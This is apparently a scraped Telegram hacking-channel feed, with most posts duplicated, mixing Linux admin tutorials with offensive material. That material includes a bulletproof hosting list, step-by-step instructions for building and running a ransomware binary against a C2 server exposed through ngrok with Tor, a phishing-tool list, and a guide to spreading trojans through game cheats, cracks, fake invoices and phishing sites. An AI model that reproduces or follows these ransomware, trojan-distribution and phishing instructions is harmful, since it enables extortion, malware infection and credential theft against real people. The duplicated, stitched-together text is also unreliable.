β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Bulletproof Hosting List (2020 Version)
vdsinside.com
vhoster.net
vinahost.vn
vinastar.net
vit.com.tr
vscale.io
vstoike.ru
webcare360.com
www.1984hosting.com
www.altushost.com
www.anonymoushosting.in
www.artmotion.eu
www.bacloud.com
www.bahnhof.net
www.cubexsweatherly.com
www.deltasystem.cl
www.dreamwebhosting.net
www.elvsoft.com
www.eserver.ru
www.flokinet.is
www.globatel.org
www.heberjahiz.com
www.host.al
www.hosthink.net
www.hostname.cl
www.hostoweb.com
www.ihc.ru
www.ihor.ru
www.infomaniak.ch
www.localhost.tn
www.m247.ro/en/
www.nine.ch
www.ninet.rs
www.nonamehosts.com
www.oblaci.rs
www.orangewebsite.com
www.pachosting.hk
www.voxility.com
www.vps.ag
www.vpsbg.eu
www.wavecom.ee
www.webhost.tn
www.webonic.hu
www.xenyohosting.com
www.xhostfire.com
www.yourserver.se
www.zgh.cl
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Bulletproof Hosting List (2020 Version)
vdsinside.com
vhoster.net
vinahost.vn
vinastar.net
vit.com.tr
vscale.io
vstoike.ru
webcare360.com
www.1984hosting.com
www.altushost.com
www.anonymoushosting.in
www.artmotion.eu
www.bacloud.com
www.bahnhof.net
www.cubexsweatherly.com
www.deltasystem.cl
www.dreamwebhosting.net
www.elvsoft.com
www.eserver.ru
www.flokinet.is
www.globatel.org
www.heberjahiz.com
www.host.al
www.hosthink.net
www.hostname.cl
www.hostoweb.com
www.ihc.ru
www.ihor.ru
www.infomaniak.ch
www.localhost.tn
www.m247.ro/en/
www.nine.ch
www.ninet.rs
www.nonamehosts.com
www.oblaci.rs
www.orangewebsite.com
www.pachosting.hk
www.voxility.com
www.vps.ag
www.vpsbg.eu
www.wavecom.ee
www.webhost.tn
www.webonic.hu
www.xenyohosting.com
www.xhostfire.com
www.yourserver.se
www.zgh.cl
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
M247Global
M247 Global β Your Trusted Global Hosting Provider
M247 Global Offers IP Transit, Cloud, Hosting & Connectivity From 36+ Data Centersβ Trusted Worldwide For Fast, Secure Infrastructure.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux :
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings may be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
E) Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
F) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
Instead of compressing the logs, we could rename them according to the date they were rewritten.
To do this, we'll use the dateext directive.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux :
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings may be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
E) Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
F) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
Instead of compressing the logs, we could rename them according to the date they were rewritten.
To do this, we'll use the dateext directive.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK Windows, Linux, macOS or even BSD systems :
F E A T U R E S :
A lot of liners use with different purposes, currently are more than 176 liner.
The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
Automation
You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
There are history and resource commands so you don't need to exit the framework.
You can execute as many commands as you want at the same time by splitting them with semi-colon.
Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/D4Vinci/One-Lin3r
2) cd One-Lin3r
3) sudo apt install libncurses5-dev
4) sudo pip3 install ./One-Lin3r --user
5) one-lin3r -h
( debian/ubuntu/kali/parrot)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK Windows, Linux, macOS or even BSD systems :
F E A T U R E S :
A lot of liners use with different purposes, currently are more than 176 liner.
The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
Automation
You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
There are history and resource commands so you don't need to exit the framework.
You can execute as many commands as you want at the same time by splitting them with semi-colon.
Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/D4Vinci/One-Lin3r
2) cd One-Lin3r
3) sudo apt install libncurses5-dev
4) sudo pip3 install ./One-Lin3r --user
5) one-lin3r -h
( debian/ubuntu/kali/parrot)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Gives you one-liners that aids in penetration testing operations, privilege escalation and more - D4Vinci/One-Lin3r
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mauri870/ransomware: A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB - mauri870/ransomware
TODAY TOPICS :
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11733Top reversed eng/ malwares in one repo
https://t.me/UnderCodeTesting/11734
https://t.me/UnderCodeTesting/11735
https://t.me/UnderCodeTesting/11736
https://t.me/UnderCodeTesting/11737
https://t.me/UnderCodeTesting/11738
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - asweigart/codebreaker: "Hacking Secret Ciphers with Python" programs
"Hacking Secret Ciphers with Python" programs. Contribute to asweigart/codebreaker development by creating an account on GitHub.
Wordpress Exploit verified for 5.5.2 version
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
GitHub
Meta: Sanitize meta key before checking protection status. Β· WordPress/wordpress-develop@d5ddd6d
Props zieladam, peterwilsoncc, xknown, whyisjake.
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#SocialMediaHacking Top Phishing tools:
- SocialFish
- HiddenEye
- Evilginx2
- I-See_You(Get Location using phishing attack)
- SayCheese (Grab target's Webcam Shots)
- QR Code Jacking
- ShellPhish
- BlackPhish
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#SocialMediaHacking Top Phishing tools:
- SocialFish
- HiddenEye
- Evilginx2
- I-See_You(Get Location using phishing attack)
- SayCheese (Grab target's Webcam Shots)
- QR Code Jacking
- ShellPhish
- BlackPhish
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - UndeadSec/SocialFish: Phishing Tool & Information Collector
Phishing Tool & Information Collector . Contribute to UndeadSec/SocialFish development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to show dropped packets for a network interface on Linux :
1) Display dropped packets for each interface on Linux using netstat
The netstat command is now deprecated.
2) The ss and ip commands are replacements for netstat.
However, netstat is still available on older Linux distributions.
So I'll start with netstat, but use the ip / ss tools if possible.
3) Syntax:
netstat -i
netstat --interfaces
4) To display summary statistics for each protocol, run:
netstat -s
netstat --statistics
5) Let's show tcp statistics
netstat --statistics --tcp
netstat -s -t
Let's show statistics udp
netstat --statistics --udp
netstat -s -u
6) Displaying dropped packet statistics on a network interface in Linux using IP
7) Let's see how to view the statistics of a network device using the ip command. Syntax:
ip -s link
ip -s link show {interface}
ip -s link show eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to show dropped packets for a network interface on Linux :
1) Display dropped packets for each interface on Linux using netstat
The netstat command is now deprecated.
2) The ss and ip commands are replacements for netstat.
However, netstat is still available on older Linux distributions.
So I'll start with netstat, but use the ip / ss tools if possible.
3) Syntax:
netstat -i
netstat --interfaces
4) To display summary statistics for each protocol, run:
netstat -s
netstat --statistics
5) Let's show tcp statistics
netstat --statistics --tcp
netstat -s -t
Let's show statistics udp
netstat --statistics --udp
netstat -s -u
6) Displaying dropped packet statistics on a network interface in Linux using IP
7) Let's see how to view the statistics of a network device using the ip command. Syntax:
ip -s link
ip -s link show {interface}
ip -s link show eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How viruses Spread :
Trojans masquerading as useful programs are a source of viruses infecting your computer.
The main ways to distribute your Trojan:
1) Protroyan gamer: Go to the gaming forum, well, or a blog where you can leave comments and glue your Trojan with cheats, as they say the profit is good, because gamers turn off their antivirus.
2) The same thing, but gluing with cracks, again comments on forums, torrent trackers, etc. The coverage is great, maybe as they say.
3) Varez music and clips, here the method is quite simple, a shortcut is made, like music / playlist, etc. for example, it runs it, and instead of it the Trojan is launched, well, of course, music / movie can also be launched to divert your eyes. The main thing is to mask your virus so that no one thinks that this is an executable file that will launch the shortcut.
4) Distribution by mail with the extension .src, you can spam by mail like there: "You got an invoice!"
5) Extensions like doc.exe are used less often, but everything is clear here, this is spam for soap, etc.
6) Another good way, this is a miracle program for hacking VKontakte, etc., there are many victims in general.
7) Phishing sites, such as update adob, chrome, etc.
8) Well, the last way, trample the hacker, go for a hack. board and put a cryptor, a stealer, etc. there. with a fucker, you can both in the build and in the builder. In the latter case, someone else will do the job for you. UPD This article was created for informational purposes only. If we missed something, add it in the comments.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How viruses Spread :
Trojans masquerading as useful programs are a source of viruses infecting your computer.
The main ways to distribute your Trojan:
1) Protroyan gamer: Go to the gaming forum, well, or a blog where you can leave comments and glue your Trojan with cheats, as they say the profit is good, because gamers turn off their antivirus.
2) The same thing, but gluing with cracks, again comments on forums, torrent trackers, etc. The coverage is great, maybe as they say.
3) Varez music and clips, here the method is quite simple, a shortcut is made, like music / playlist, etc. for example, it runs it, and instead of it the Trojan is launched, well, of course, music / movie can also be launched to divert your eyes. The main thing is to mask your virus so that no one thinks that this is an executable file that will launch the shortcut.
4) Distribution by mail with the extension .src, you can spam by mail like there: "You got an invoice!"
5) Extensions like doc.exe are used less often, but everything is clear here, this is spam for soap, etc.
6) Another good way, this is a miracle program for hacking VKontakte, etc., there are many victims in general.
7) Phishing sites, such as update adob, chrome, etc.
8) Well, the last way, trample the hacker, go for a hack. board and put a cryptor, a stealer, etc. there. with a fucker, you can both in the build and in the builder. In the latter case, someone else will do the job for you. UPD This article was created for informational purposes only. If we missed something, add it in the comments.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π‘ How to install dnscrypt proxy with ad blocker on Linux
#REQUESTED
1) Debian/Ubuntu :
$ sudo apt install dnscrypt-proxy
## Alpine Linux
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ:
$ sudo yum install dnscrypt-proxy
## Arch Linux ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠΉΡΠ΅ pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE/SUSE Linux
$ sudo zypper in dnscrypt-proxy
## Fedora dnf ##
$ sudo dnf install dnscrypt-proxy
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
> For instance:
$ ls -l /etc/dnscrypt-proxy/
